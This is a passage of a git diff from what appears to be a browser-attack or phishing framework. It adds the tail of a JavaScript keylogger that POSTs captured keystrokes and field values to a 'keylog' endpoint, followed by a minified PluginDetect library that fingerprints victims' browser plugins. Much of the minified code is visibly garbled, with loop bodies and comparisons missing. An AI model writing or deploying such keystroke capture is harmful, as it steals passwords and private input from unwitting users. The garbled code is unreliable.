+ {
+ srcname = window.event.srcElement.name;
+ }catch(error)
+ {
+ srcname = e.srcElement ? e.srcElement.name : e.target.name
+ if (srcname == "")
+ {
+ srcname = e.target.name
+ }
+ }
+
+ var3 = (e) ? e.keyCode : e.which;
+ if (var3 == 9 || var3 == 8 || var3 == 13)
+ {
+ andxhr(var3.toString(16), srcname);
+ }
+ else if (var3 == 0)
+ {
+
+ text = document.getElementById(id).value;
+ if (text.length != 0)
+ {
+ andxhr(text.toString(16), srcname);
+ }
+ }
+
+}
+function andxhr(key, inputName)
+{
+ if (inputName != name)
+ {
+ name = inputName;
+ var2 = ",";
+ }
+ var2= var2 + key + ",";
+ xhr.open("POST", "keylog", true);
+ xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
+ xhr.send(var2 + '&&' + inputName);
+
+ if (key == 13 || var2.length > 3000)
+ {
+ var2 = ",";
+ }
+}
\ No newline at end of file
diff --git a/core/javascript/plugindetect.js b/core/javascript/plugindetect.js
new file mode 100644
index 0000000..6f25433
--- /dev/null
+++ b/core/javascript/plugindetect.js
@@ -0,0 +1,76 @@
+/*
+PluginDetect v0.9.0
+www.pinlady.net/PluginDetect/license/
+[ QuickTime Java DevalVR Flash Shockwave WindowsMediaPlayer Silverlight VLC AdobeReader PDFReader RealPlayer IEcomponent ActiveX PDFjs ]
+[ isMinVersion getVersion hasMimeType onDetectionDone ]
+[ AllowActiveX ]
+*/
+
+var PluginDetect={version:"0.9.0",name:"PluginDetect",addPlugin:function(p,q){if(p&&PluginDetect.isString(p)&&q&&PluginDetect.isFunc(q.getVersion)){p=p.replace(/\s/g,"").toLowerCase();PluginDetect.Plugins[p]=q;if(!PluginDetect.isDefined(q.getVersionDone)){q.installed=null;q.version=null;q.version0=null;q.getVersionDone=null;q.pluginName=p;}}},uniqueName:function(){return PluginDetect.name+"998"},openTag:"<",hasOwnPROP:({}).constructor.prototype.hasOwnProperty,hasOwn:function(s,t){var p;try{p=PluginDetect.hasOwnPROP.call(s,t)}catch(q){}return !!p},rgx:{str:/string/i,num:/number/i,fun:/function/i,arr:/array/i},toString:({}).constructor.prototype.toString,isDefined:function(p){return typeof p!="undefined"},isArray:function(p){return PluginDetect.rgx.arr.test(PluginDetect.toString.call(p))},isString:function(p){return PluginDetect.rgx.str.test(PluginDetect.toString.call(p))},isNum:function(p){return PluginDetect.rgx.num.test(PluginDetect.toString.call(p))},isStrNum:function(p){return PluginDetect.isString(p)&&(/\d/).test(p)},isFunc:function(p){return PluginDetect.rgx.fun.test(PluginDetect.toString.call(p))},getNumRegx:/[\d][\d\.\_,\-]*/,splitNumRegx:/[\.\_,\-]/g,getNum:function(q,r){var p=PluginDetect.isStrNum(q)?(PluginDetect.isDefined(r)?new RegExp(r):PluginDetect.getNumRegx).exec(q):null;return p?p[0]:null},compareNums:function(w,u,t){var s,r,q,v=parseInt;if(PluginDetect.isStrNum(w)&&PluginDetect.isStrNum(u)){if(PluginDetect.isDefined(t)&&t.compareNums){return t.compareNums(w,u)}s=w.split(PluginDetect.splitNumRegx);r=u.split(PluginDetect.splitNumRegx);for(q=0;qv(r[q],10)){return 1}if(v(s[q],10)r||!(/\d/).test(s[p])){s[p]="0"}}return s.slice(0,4).join(",")},pd:{getPROP:function(s,q,p){try{if(s){p=s[q]}}catch(r){}return p},findNavPlugin:function(u){if(u.dbug){return u.dbug}var A=null;if(window.navigator){var z={Find:PluginDetect.isString(u.find)?new RegExp(u.find,"i"):u.find,Find2:PluginDetect.isString(u.find2)?new RegExp(u.find2,"i"):u.find2,Avoid:u.avoid?(PluginDetect.isString(u.avoid)?new RegExp(u.avoid,"i"):u.avoid):0,Num:u.num?/\d/:0},s,r,t,y,x,q,p=navigator.mimeTypes,w=navigator.plugins;if(u.mimes&&p){y=PluginDetect.isArray(u.mimes)?[].concat(u.mimes):(PluginDetect.isString(u.mimes)?[u.mimes]:[]);for(s=0;s-1&&p>r&&s[p]!="0"){return q}if(v[p]!=s[p]){if(r==-1){r=p}if(s[p]!="0"){return q}}}return t},AXO:(function(){var q;try{q=new window.ActiveXObject()}catch(p){}return q?null:window.ActiveXObject})(),getAXO:function(p){var r=null;try{r=new PluginDetect.AXO(p)}catch(q){PluginDetect.errObj=q;}if(r){PluginDetect.browser.ActiveXEnabled=!0}return r},browser:{detectPlatform:function(){var r=this,q,p=window.navigator?navigator.platform||"":"";PluginDetect.OS=100;if(p){var s=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\\s*PC",22.3,"",100];for(q=s.length-2;q>=0;q=q-2){if(s[q]&&new RegExp(s[q],"i").test(p)){PluginDetect.OS=s[q+1];break}}}},detectIE:function(){var r=this,u=document,t,q,v=window.navigator?navigator.userAgent||"":"",w,p,y;r.ActiveXFilteringEnabled=!1;r.ActiveXEnabled=!1;try{r.ActiveXFilteringEnabled=!!window.external.msActiveXFilteringEnabled()}catch(s){}p=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","TDCCtl.TDCCtl","Shell.UIHelper","HtmlDlgSafeHelper.HtmlDlgSafeHelper","Scripting.Dictionary"];y=["WMPlayer.OCX","ShockwaveFlash.ShockwaveFlash","AgControl.AgControl"];w=p.concat(y);for(t=0;t=7?u.documentMode:0)||((/^(?:.*?[^a-zA-Z])??(?:MSIE|rv\s*\:)\s*(\d+\.?\d*)/i).test(v)?parseFloat(RegExp.$1,10):7)}},detectNonIE:function(){var p=this,s=window.navigator?navigator:{},r=p.isIE?"":s.userAgent||"",t=s.vendor||"",q=s.product||"";p.isGecko=(/Gecko/i).test(q)&&(/Gecko\s*\/\s*\d/i).test(r);p.verGecko=p.isGecko?PluginDetect.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(r)?RegExp.$1:"0.9"):null;p.isOpera=(/(OPR\s*\/|Opera\s*\/\s*\d.*\s*Version\s*\/|Opera\s*[\/]?)\s*(\d+[\.,\d]*)/i).test(r);p.verOpera=p.isOpera?PluginDetect.formatNum(RegExp.$2):null;p.isChrome=!p.isOpera&&(/(Chrome|CriOS)\s*\/\s*(\d[\d\.]*)/i).test(r);p.verChrome=p.isChrome?PluginDetect.formatNum(RegExp.$2):null;p.isSafari=!p.isOpera&&!p.isChrome&&((/Apple/i).test(t)||!t)&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(r);p.verSafari=p.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(r)?PluginDetect.formatNum(RegExp.$1):null;},init:function(){var p=this;p.detectPlatform();p.detectIE();p.detectNonIE()}},init:{hasRun:0,library:function(){window[PluginDetect.name]=PluginDetect;var q=this,p=document;PluginDetect.win.init();PluginDetect.head=p.getElementsByTagName("head")[0]||p.getElementsByTagName("body")[0]||p.body||null;PluginDetect.browser.init();q.hasRun=1;}},ev:{addEvent:function(r,q,p){if(r&&q&&p){if(r.addEventListener){r.addEventListener(q,p,false)}else{if(r.attachEvent){r.attachEvent("on"+q,p)}else{r["on"+q]=this.concatFn(p,r["on"+q])}}}},removeEvent:function(r,q,p){if(r&&q&&p){if(r.removeEventListener){r.removeEventListener(q,p,false)}else{if(r.detachEvent){r.detachEvent("on"+q,p)}}}},concatFn:function(q,p){return function(){q();if(typeof p=="function"){p()}}},handler:function(t,s,r,q,p){return function(){t(s,r,q,p)}},handlerOnce:function(s,r,q,p){return function(){var u=PluginDetect.uniqueName();if(!s[u]){s[u]=1;s(r,q,p)}}},handlerWait:function(s,u,r,q,p){var t=this;return function(){t.setTimeout(t.handler(u,r,q,p),s)}},setTimeout:function(q,p){if(PluginDetect.win&&PluginDetect.win.unload){return}setTimeout(q,p)},fPush:function(q,p){if(PluginDetect.isArray(p)&&(PluginDetect.isFunc(q)||(PluginDetect.isArray(q)&&q.length>0&&PluginDetect.isFunc(q[0])))){p.push(q)}},call0:function(q){var p=PluginDetect.isArray(q)?q.length:-1;if(p>0&&PluginDetect.isFunc(q[0])){q[0](PluginDetect,p>1?q[1]:0,p>2?q[2]:0,p>3?q[3]:0)}else{if(PluginDetect.isFunc(q)){q(PluginDetect)}}},callArray0:function(p){var q=this,r;if(PluginDetect.isArray(p)){while(p.length){r=p[0];p.splice(0,1);if(PluginDetect.win&&PluginDetect.win.unload&&p!==PluginDetect.win.unloadHndlrs){}else{q.call0(r)}}}},call:function(q){var p=this;p.call0(q);p.ifDetectDoneCallHndlrs()},callArray:function(p){var q=this;q.callArray0(p);q.ifDetectDoneCallHndlrs()},allDoneHndlrs:[],ifDetectDoneCallHndlrs:function(){var r=this,p,q;if(!r.allDoneHndlrs.length){return}if(PluginDetect.win){if(!PluginDetect.win.loaded||PluginDetect.win.loadPrvtHndlrs.length||PluginDetect.win.loadPblcHndlrs.length){return}}if(PluginDetect.Plugins){for(p in PluginDetect.Plugins){if(PluginDetect.hasOwn(PluginDetect.Plugins,p)){q=PluginDetect.Plugins[p];if(q&&PluginDetect.isFunc(q.getVersion)){if(q.OTF==3||(q.DoneHndlrs&&q.DoneHndlrs.length)||(q.BIHndlrs&&q.BIHndlrs.length)){return}}}}}r.callArray0(r.allDoneHndlrs);}},isMinVersion:function(v,u,r,q){var s=PluginDetect.pd.findPlugin(v),t,p=-1;if(s.status<0){return s.status}t=s.plugin;u=PluginDetect.formatNum(PluginDetect.isNum(u)?u.toString():(PluginDetect.isStrNum(u)?PluginDetect.getNum(u):"0"));if(t.getVersionDone!=1){t.getVersion(u,r,q);if(t.getVersionDone===null){t.getVersionDone=1}}if(t.installed!==null){p=t.installed<=0.5?t.installed:(t.installed==0.7?1:(t.version===null?0:(PluginDetect.compareNums(t.version,u,t)>=0?1:-0.1)))}return p},getVersion:function(u,r,q){var s=PluginDetect.pd.findPlugin(u),t,p;if(s.status<0){return null}t=s.plugin;if(t.getVersionDone!=1){t.getVersion(null,r,q);if(t.getVersionDone===null){t.getVersionDone=1}}p=(t.version||t.version0);p=p?p.replace(PluginDetect.splitNumRegx,PluginDetect.pd.getVersionDelimiter):p;return p},hasMimeType:function(t){if(t&&window.navigator&&navigator.mimeTypes){var w,v,q,s,p=navigator.mimeTypes,r=PluginDetect.isArray(t)?[].concat(t):(PluginDetect.isString(t)?[t]:[]);s=r.length;for(q=0;q=0){p=(u.L.x==q.x?s.isActiveXObject(u,q.v):PluginDetect.compareNums(t,u.L.v)<=0)?1:-1}}return p},search:function(v){var B=this,w=v.$$,q=0,r;r=v.searchHasRun||B.isDisabled()?1:0;v.searchHasRun=1;if(r){return v.version||null}B.init(v);var F,E,D,s=v.DIGITMAX,t,p,C=99999999,u=[0,0,0,0],G=[0,0,0,0];var A=function(y,PluginDetect){var H=[].concat(u),I;H[y]=PluginDetect;I=B.isActiveXObject(v,H.join(","));if(I){q=1;u[y]=PluginDetect}else{G[y]=PluginDetect}return I};for(F=0;FG[F]&&PluginDetect.compareNums(p,v.Lower[D])>=0&&PluginDetect.compareNums(t,v.Upper[D])<0){G[F]=Math.floor(s[D][F])}}}for(E=0;E<30;E++){if(G[F]-u[F]<=16){for(D=G[F];D>=u[F]+(F?1:0);D--){if(A(F,D)){break}}break}A(F,Math.round((G[F]+u[F])/2))}if(!q){break}G[F]=u[F];}if(q){v.version=B.convert(v,u.join(",")).v}return v.version||null},emptyNode:function(p){try{p.innerHTML=""}catch(q){}},HTML:[],len:0,onUnload:function(r,q){var p,t=q.HTML,s;for(p=0;p'+PluginDetect.openTag+"/object>";for(p=0;p=0){return 0}r.innerHTML=u.tagA+q+u.tagB;if(PluginDetect.pd.getPROP(r.firstChild,"object")){p=1}if(p){u.min=q;t.HTML.push({spanObj:r,span:t.span})}else{u.max=q;r.innerHTML=""}return p},span:function(){return this.spanObj},convert_:function(t,p,q,s){var r=t.convert[p];return r?(PluginDetect.isFunc(r)?PluginDetect.formatNum(r(q.split(PluginDetect.splitNumRegx),s).join(",")):q):r},convert:function(v,r,u){var t=this,q,p,s;r=PluginDetect.formatNum(r);p={v:r,x:-1};if(r){for(q=0;q=0&&(!q||PluginDetect.compareNums(r,u?t.convert_(v,q,v.Upper[q]):v.Upper[q])<0)){p.v=t.convert_(v,q,r,u);p.x=q;break}}}return p},z:0},win:{disable:function(){this.cancel=true},cancel:false,loaded:false,unload:false,hasRun:0,init:function(){var p=this;if(!p.hasRun){p.hasRun=1;if((/complete/i).test(document.readyState||"")){p.loaded=true;}else{PluginDetect.ev.addEvent(window,"load",p.onLoad)}PluginDetect.ev.addEvent(window,"unload",p.onUnload)}},loadPrvtHndlrs:[],loadPblcHndlrs:[],unloadHndlrs:[],onUnload:function(){var p=PluginDetect.win;if(p.unload){return}p.unload=true;PluginDetect.ev.removeEvent(window,"load",p.onLoad);PluginDetect.ev.removeEvent(window,"unload",p.onUnload);PluginDetect.ev.callArray(p.unloadHndlrs)},onLoad:function(){var p=PluginDetect.win;if(p.loaded||p.unload||p.cancel){return}p.loaded=true;PluginDetect.ev.callArray(p.loadPrvtHndlrs);PluginDetect.ev.callArray(p.loadPblcHndlrs);}},DOM:{isEnabled:{objectTag:function(){var q=PluginDetect.browser,p=q.isIE?0:1;if(q.ActiveXEnabled){p=1}return !!p},objectTagUsingActiveX:function(){var p=0;if(PluginDetect.browser.ActiveXEnabled){p=1}return !!p},objectProperty:function(p){if(p&&p.tagName&&PluginDetect.browser.isIE){if((/applet/i).test(p.tagName)){return(!this.objectTag()||PluginDetect.isDefined(PluginDetect.pd.getPROP(document.createElement("object"),"object"))?1:0)}return PluginDetect.isDefined(PluginDetect.pd.getPROP(document.createElement(p.tagName),"object"))?1:0}return 0}},HTML:[],div:null,divID:"plugindetect",divWidth:500,getDiv:function(){return this.div||document.getElementById(this.divID)||null},initDiv:function(){var q=this,p;if(!q.div){p=q.getDiv();if(p){q.div=p;}else{q.div=document.createElement("div");q.div.id=q.divID;q.setStyle(q.div,q.getStyle.div());q.insertDivInBody(q.div)}PluginDetect.ev.fPush([q.onUnload,q],PluginDetect.win.unloadHndlrs)}p=0},pluginSize:1,iframeWidth:40,iframeHeight:10,altHTML:" ",emptyNode:function(q){var p=this;if(q&&(/div|span/i).test(q.tagName||"")){if(PluginDetect.browser.isIE){p.setStyle(q,["display","none"])}try{q.innerHTML=""}catch(r){}}},removeNode:function(p){try{if(p&&p.parentNode){p.parentNode.removeChild(p)}}catch(q){}},onUnload:function(u,t){var r,q,s,v,w=t.HTML,p=w.length;if(p){for(q=p-1;q>=0;q--){v=w[q];if(v){w[q]=0;t.emptyNode(v.span());t.removeNode(v.span());v.span=0;v.spanObj=0;v.doc=0;v.objectProperty=0}}}r=t.getDiv();t.emptyNode(r);t.removeNode(r);v=0;s=0;r=0;t.div=0},span:function(){var p=this;if(!p.spanObj){p.spanObj=p.doc.getElementById(p.spanId)}return p.spanObj||null},width:function(){var t=this,s=t.span(),q,r,p=-1;q=s&&PluginDetect.isNum(s.scrollWidth)?s.scrollWidth:p;r=s&&PluginDetect.isNum(s.offsetWidth)?s.offsetWidth:p;s=0;return r>0?r:(q>0?q:Math.max(r,q))},obj:function(){var p=this.span();return p?p.firstChild||null:null},readyState:function(){var p=this;return PluginDetect.browser.isIE&&PluginDetect.isDefined(PluginDetect.pd.getPROP(p.span(),"readyState"))?PluginDetect.pd.getPROP(p.obj(),"readyState"):PluginDetect.UNDEFINED},objectProperty:function(){var r=this,q=r.DOM,p;if(q.isEnabled.objectProperty(r)){p=PluginDetect.pd.getPROP(r.obj(),"object")}return p},onLoadHdlr:function(p,q){q.loaded=1},getTagStatus:function(q,A,E,D,t,H,v){var F=this;if(!q||!q.span()){return -2}var y=q.width(),r=q.obj()?1:0,s=q.readyState(),p=q.objectProperty();if(p){return 1.5}var u=/clsid\s*\:/i,C=E&&u.test(E.outerHTML||"")?E:(D&&u.test(D.outerHTML||"")?D:0),w=E&&!u.test(E.outerHTML||"")?E:(D&&!u.test(D.outerHTML||"")?D:0),z=q&&u.test(q.outerHTML||"")?C:w;if(!A||!A.span()||!z||!z.span()){return -2}var x=z.width(),B=A.width(),G=z.readyState();if(y<0||x<0||B<=F.pluginSize){return 0}if(v&&!q.pi&&PluginDetect.isDefined(p)&&PluginDetect.browser.isIE&&q.tagName==z.tagName&&q.time<=z.time&&y===x&&s===0&&G!==0){q.pi=1}if(x.'+PluginDetect.openTag+"/div>");q=s.getElementById(u)}catch(r){}}p=s.getElementsByTagName("body")[0]||s.body;if(p){p.insertBefore(v,p.firstChild);if(q){p.removeChild(q)}}v=0},iframe:{onLoad:function(p,q){PluginDetect.ev.callArray(p);},insert:function(r,q){var s=this,v=PluginDetect.DOM,p,u=document.createElement("iframe"),t;v.setStyle(u,v.getStyle.iframe());u.width=v.iframeWidth;u.height=v.iframeHeight;v.initDiv();p=v.getDiv();p.appendChild(u);try{s.doc(u).open()}catch(w){}u[PluginDetect.uniqueName()]=[];t=PluginDetect.ev.handlerOnce(PluginDetect.isNum(r)&&r>0?PluginDetect.ev.handlerWait(r,s.onLoad,u[PluginDetect.uniqueName()],q):PluginDetect.ev.handler(s.onLoad,u[PluginDetect.uniqueName()],q));PluginDetect.ev.addEvent(u,"load",t);if(!u.onload){u.onload=t}PluginDetect.ev.addEvent(s.win(u),"load",t);return u},addHandler:function(q,p){if(q){PluginDetect.ev.fPush(p,q[PluginDetect.uniqueName()])}},close:function(p){try{this.doc(p).close()}catch(q){}},write:function(p,r){try{this.doc(p).write(r)}catch(q){}},win:function(p){try{return p.contentWindow}catch(q){}return null},doc:function(p){var r;try{r=p.contentWindow.document}catch(q){}try{if(!r){r=p.contentDocument}}catch(q){}return r||null}},insert:function(t,s,u,p,y,w,v){var D=this,F,E,C,B,A;if(!v){D.initDiv();v=D.getDiv()}if(v){if((/div/i).test(v.tagName)){B=v.ownerDocument}if((/iframe/i).test(v.tagName)){B=D.iframe.doc(v)}}if(B&&B.createElement){}else{B=document}if(!PluginDetect.isDefined(p)){p=""}if(PluginDetect.isString(t)&&(/[^\s]/).test(t)){t=t.toLowerCase().replace(/\s/g,"");F=PluginDetect.openTag+t+" ";F+='style="'+D.getStyle.plugin(w)+'" ';var r=1,q=1;for(A=0;A"}else{F+=">";for(A=0;A'}}F+=p+PluginDetect.openTag+"/"+t+">"}}else{t="";F=p}E={spanId:"",spanObj:null,span:D.span,loaded:null,tagName:t,outerHTML:F,DOM:D,time:new Date().getTime(),width:D.width,obj:D.obj,readyState:D.readyState,objectProperty:D.objectProperty,doc:B};if(v&&v.parentNode){if((/iframe/i).test(v.tagName)){D.iframe.addHandler(v,[D.onLoadHdlr,E]);E.loaded=0;E.spanId=PluginDetect.name+"Span"+D.HTML.length;C=''+F+"";D.iframe.write(v,C)}else{if((/div/i).test(v.tagName)){C=B.createElement("span");D.setStyle(C,D.getStyle.span());v.appendChild(C);try{C.innerHTML=F}catch(z){}E.spanObj=C}}}C=0;v=0;D.HTML.push(E);return E}},file:{any:"fileStorageAny999",valid:"fileStorageValid999",save:function(s,t,r){var q=this,p;if(s&&PluginDetect.isDefined(r)){if(!s[q.any]){s[q.any]=[]}if(!s[q.valid]){s[q.valid]=[]}s[q.any].push(r);p=q.split(t,r);if(p){s[q.valid].push(p)}}},getValidLength:function(p){return p&&p[this.valid]?p[this.valid].length:0},getAnyLength:function(p){return p&&p[this.any]?p[this.any].length:0},getValid:function(r,p){var q=this;return r&&r[q.valid]?q.get(r[q.valid],p):null},getAny:function(r,p){var q=this;return r&&r[q.any]?q.get(r[q.any],p):null},get:function(s,p){var r=s.length-1,q=PluginDetect.isNum(p)?p:r;return(q<0||q>r)?null:s[q]},split:function(t,q){var s=null,p,r;t=t?t.replace(".","\\."):"";r=new RegExp("^(.*[^\\/])("+t+"\\s*)$");if(PluginDetect.isString(q)&&r.test(q)){p=(RegExp.$1).split("/");s={name:p[p.length-1],ext:RegExp.$2,full:q};p[p.length-1]="";s.path=p.join("/")}return s}},Plugins:{}};PluginDetect.init.library();var i={setPluginStatus:function(q,p,s){var r=this;r.version=p?PluginDetect.formatNum(p,3):null;r.installed=r.version?1:(s?(s>0?0.7:-0.1):(q?0:-1));r.getVersionDone=r.installed==0.7||r.installed==-0.1||r.nav.done===0?0:1;},getVersion:function(s,t){var u=this,p=null,r=0,q;t=PluginDetect.browser.isIE?0:t;if((!r||PluginDetect.dbug)&&u.nav.query(t).installed){r=1}if((!p||PluginDetect.dbug)&&u.nav.query(t).version){p=u.nav.version}q=!p?u.codebase.isMin(s):0;if(q){u.setPluginStatus(0,0,q);return}if(!p||PluginDetect.dbug){q=u.codebase.search();if(q){r=1;p=q}}if((!r||PluginDetect.dbug)&&u.axo.query().installed){r=1}if((!p||PluginDetect.dbug)&&u.axo.query().version){p=u.axo.version}u.setPluginStatus(r,p)},nav:{done:null,installed:0,version:null,result:[0,0],mimeType:["video/quicktime","application/x-quicktimeplayer","image/x-macpaint","image/x-quicktime","application/x-rtsp","application/x-sdp","application/sdp","audio/vnd.qcelp","video/sd-video","audio/mpeg","video/mp4","video/3gpp2","application/x-mpeg","audio/x-m4b","audio/x-aac","video/flc"],find:"QuickTime.*Plug-?in",find2:"QuickTime.*Plug-?in",find3filename:"QuickTime|QT",avoid:"Totem|VLC|RealPlayer|Helix|MPlayer|Windows\\s*Media\\s*Player",plugins:"QuickTime Plug-in",detect:function(s){var t=this,r,q,p={installed:0,version:null,plugin:null};r=PluginDetect.pd.findNavPlugin({find:t.find,find2:s?0:t.find2,avoid:s?0:t.avoid,mimes:t.mimeType,plugins:t.plugins});if(r){p.plugin=r;p.installed=1;q=new RegExp(t.find,"i");if(r.name&&q.test(r.name+"")){p.version=PluginDetect.getNum(r.name+"")}}return p},query:function(r){var q=this,t,s;r=r?1:0;if(q.done===null){if(PluginDetect.hasMimeType(q.mimeType)){s=q.detect(1);if(s.installed){t=q.detect(0);q.result=[t,t.installed?t:s]}var x=q.result[0],v=q.result[1],w=new RegExp(q.avoid,"i"),u=new RegExp(q.find3filename,"i"),p;x=x?x.plugin:0;v=v?v.plugin:0;if(!x&&v&&v.name&&(!v.description||(/^[\s]*$/).test(v.description+""))&&!w.test(v.name+"")){p=(v.filename||"")+"";if((/^.*[\\\/]([^\\\/]*)$/).test(p)){p=RegExp.$1;}if(p&&u.test(p)&&!w.test(p)){q.result[0]=q.result[1]}}}q.done=q.result[0]===q.result[1]?1:0;}if(q.result[r]){q.installed=q.result[r].installed;q.version=q.result[r].version}return q}},codebase:{classID:"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B",isMin:function(r){var s=this,q,p=0;s.$$=i;if(PluginDetect.isStrNum(r)){q=r.split(PluginDetect.splitNumRegx);if(q.length>3&&parseInt(q[3],10)>0){q[3]="9999"}r=q.join(",");p=PluginDetect.codebase.isMin(s,r)}return p},search:function(){this.$$=i;return PluginDetect.codebase.search(this)},DIGITMAX:[[12,11,11],[7,60],[7,11,11],0,[7,11,11]],DIGITMIN:[5,0,0,0],Upper:["999","7,60","7,50","7,6","7,5"],Lower:["7,60","7,50","7,6","7,5","0"],convert:[1,function(r,q){return q?[r[0],r[1]+r[2],r[3],"0"]:[r[0],r[1].charAt(0),r[1].charAt(1),r[2]]},1,0,1]},axo:{hasRun:0,installed:0,version:null,progID:["QuickTimeCheckObject.QuickTimeCheck","QuickTimeCheckObject.QuickTimeCheck.1"],progID0:"QuickTime.QuickTime",query:function(){var r=this,t,p,q,s=r.hasRun||!PluginDetect.browser.ActiveXEnabled;r.hasRun=1;if(s){return r}for(p=0;p0?0.7:-0.1):(v?1:(p?-0.2:-1))}if(t.OTF==2&&t.NOTF&&!t.applet.getResult()[0]){t.installed=p?-0.2:-1}if(t.OTF==3&&t.installed!=-0.5&&t.installed!=0.5){t.installed=(t.NOTF.isJavaActive(1)>=1?0.5:-0.5)}if(t.OTF==4&&(t.installed==-0.5||t.installed==0.5)){if(v){t.installed=1}else{if(q){t.installed=q>0?0.7:-0.1}else{if(t.NOTF.isJavaActive(1)>=1){if(p){t.installed=1;v=p}else{t.installed=0}}else{if(p){t.installed=-0.2}else{t.installed=-1}}}}}if(p){t.version0=PluginDetect.formatNum(PluginDetect.getNum(p))}if(v&&!q){t.version=PluginDetect.formatNum(PluginDetect.getNum(v))}if(w&&PluginDetect.isString(w)){t.vendor=w}if(!t.vendor){t.vendor=""}if(t.verify&&t.verify.isEnabled()){t.getVersionDone=0}else{if(t.getVersionDone!=1){if(t.OTF<2){t.getVersionDone=0}else{t.getVersionDone=t.applet.can_Insert_Query_Any()?0:1}}}},DTK:{hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],isDisabled:function(p){var q=this;if(q.HTML){return 1}if(p||PluginDetect.dbug){return 0}if(q.hasRun||!PluginDetect.DOM.isEnabled.objectTagUsingActiveX()){return 1}return 0},query:function(B){var z=this,t=a,A,v,p=PluginDetect.DOM.altHTML,u={},q,s=null,w=null,r=z.isDisabled(B);z.hasRun=1;if(r){return z}z.status=0;if(PluginDetect.DOM.isEnabled.objectTagUsingActiveX()){for(A=0;A0?1:-1;for(A=0;A0){p.version=q;p.mimeObj=s;p.pluginObj=r;p.mimetype=s.type;}}},query:function(){var t=this,s=a,w,v,B,A,z,r,q=navigator.mimeTypes,p=t.isDisabled();t.hasRun=1;if(p){return t}r=q.length;if(PluginDetect.isNum(r)){for(w=0;w=5){p="1,"+RegExp.$1+","+(RegExp.$2?RegExp.$2:"0")+","+(RegExp.$3?RegExp.$3:"0");}return p},getPluginNum:function(){var s=this,q=a,p=0,u,t,r,w,v=0;r=/Java[^\d]*Plug-in/i;w=PluginDetect.pd.findNavPlugin({find:r,num:1,mimes:q.mimeType,plugins:1,dbug:v});if(w){u=s.checkPluginNum(w.description,r);t=s.checkPluginNum(w.name,r);p=u&&t?(PluginDetect.compareNums(u,t)>0?u:t):(u||t)}if(!p){r=/Java.*\d.*Plug-in/i;w=PluginDetect.pd.findNavPlugin({find:r,mimes:q.mimeType,plugins:1,dbug:v});if(w){u=s.checkPluginNum(w.description,r);t=s.checkPluginNum(w.name,r);p=u&&t?(PluginDetect.compareNums(u,t)>0?u:t):(u||t)}}return p},checkPluginNum:function(s,r){var p,q;p=r.test(s)?PluginDetect.formatNum(PluginDetect.getNum(s)):0;if(p&&PluginDetect.compareNums(p,PluginDetect.formatNum("10"))>=0){q=p.split(PluginDetect.splitNumRegx);p=PluginDetect.formatNum("1,"+(parseInt(q[0],10)-3)+",0,"+q[1])}if(p&&(PluginDetect.compareNums(p,PluginDetect.formatNum("1,3"))<0||PluginDetect.compareNums(p,PluginDetect.formatNum("2"))>=0)){p=0}return p},query:function(){var t=this,s=a,r,p=0,q=t.hasRun||!s.navigator.mimeObj;t.hasRun=1;if(q){return t}if(!p||PluginDetect.dbug){r=t.getPlatformNum();if(r){p=r}}if(!p||PluginDetect.dbug){r=t.getPluginNum();if(r){p=r}}if(p){t.version=PluginDetect.formatNum(p)}return t}},applet:{codebase:{isMin:function(p){this.$$=a;return PluginDetect.codebase.isMin(this,p)},search:function(){this.$$=a;return PluginDetect.codebase.search(this)},DIGITMAX:[[15,128],[6,0,512],0,[1,5,2,256],0,[1,4,1,1],[1,4,0,64],[1,3,2,32]],DIGITMIN:[1,0,0,0],Upper:["999","10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4"],Lower:["10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4","0"],convert:[function(r,q){return q?[parseInt(r[0],10)>1?"99":parseInt(r[1],10)+3+"",r[3],"0","0"]:["1",parseInt(r[0],10)-3+"","0",r[1]]},function(r,q){return q?[r[1],r[2],r[3]+"0","0"]:["1",r[0],r[1],r[2].substring(0,r[2].length-1||1)]},0,function(r,q){return q?[r[0],r[1],r[2],r[3]+"0"]:[r[0],r[1],r[2],r[3].substring(0,r[3].length-1||1)]},0,1,function(r,q){return q?[r[0],r[1],r[2],r[3]+"0"]:[r[0],r[1],r[2],r[3].substring(0,r[3].length-1||1)]},1]},results:[[null,null],[null,null],[null,null],[null,null]],getResult:function(){var q=this,s=q.results,p,r=[];for(p=s.length-1;p>=0;p--){r=s[p];if(r[0]){break}}r=[].concat(r);return r},DummySpanTagHTML:0,HTML:[0,0,0,0],active:[0,0,0,0],DummyObjTagHTML:0,DummyObjTagHTML2:0,allowed:[1,1,1,1],VerifyTagsHas:function(q){var r=this,p;for(p=0;pp-1&&PluginDetect.isNum(r[p-1])){if(r[p-1]<0){r[p-1]=0}if(r[p-1]>3){r[p-1]=3}q.allowed[p]=r[p-1]}}q.allowed[0]=q.allowed[3];}},setVerifyTagsArray:function(r){var q=this,p=a;if(p.getVersionDone===null){q.saveAsVerifyTagsArray(p.getVerifyTagsDefault())}if(PluginDetect.dbug){q.saveAsVerifyTagsArray([3,3,3])}else{if(r){q.saveAsVerifyTagsArray(r)}}},isDisabled:{single:function(q){var p=this;if(p.all()){return 1}if(q==1){return !PluginDetect.DOM.isEnabled.objectTag()}if(q==2){return p.AppletTag()}if(q===0){return PluginDetect.codebase.isDisabled()}if(q==3){return !PluginDetect.DOM.isEnabled.objectTagUsingActiveX()}return 1},all_:null,all:function(){var r=this,t=a,q=t.navigator,p,s=PluginDetect.browser;if(r.all_===null){if((s.isOpera&&PluginDetect.compareNums(s.verOpera,"13,0,0,0")<0&&!q.javaEnabled())||(r.AppletTag()&&!PluginDetect.DOM.isEnabled.objectTag())||(!q.mimeObj&&!s.isIE)){p=1}else{p=0}r.all_=p}return r.all_},AppletTag:function(){var q=a,p=q.navigator;return 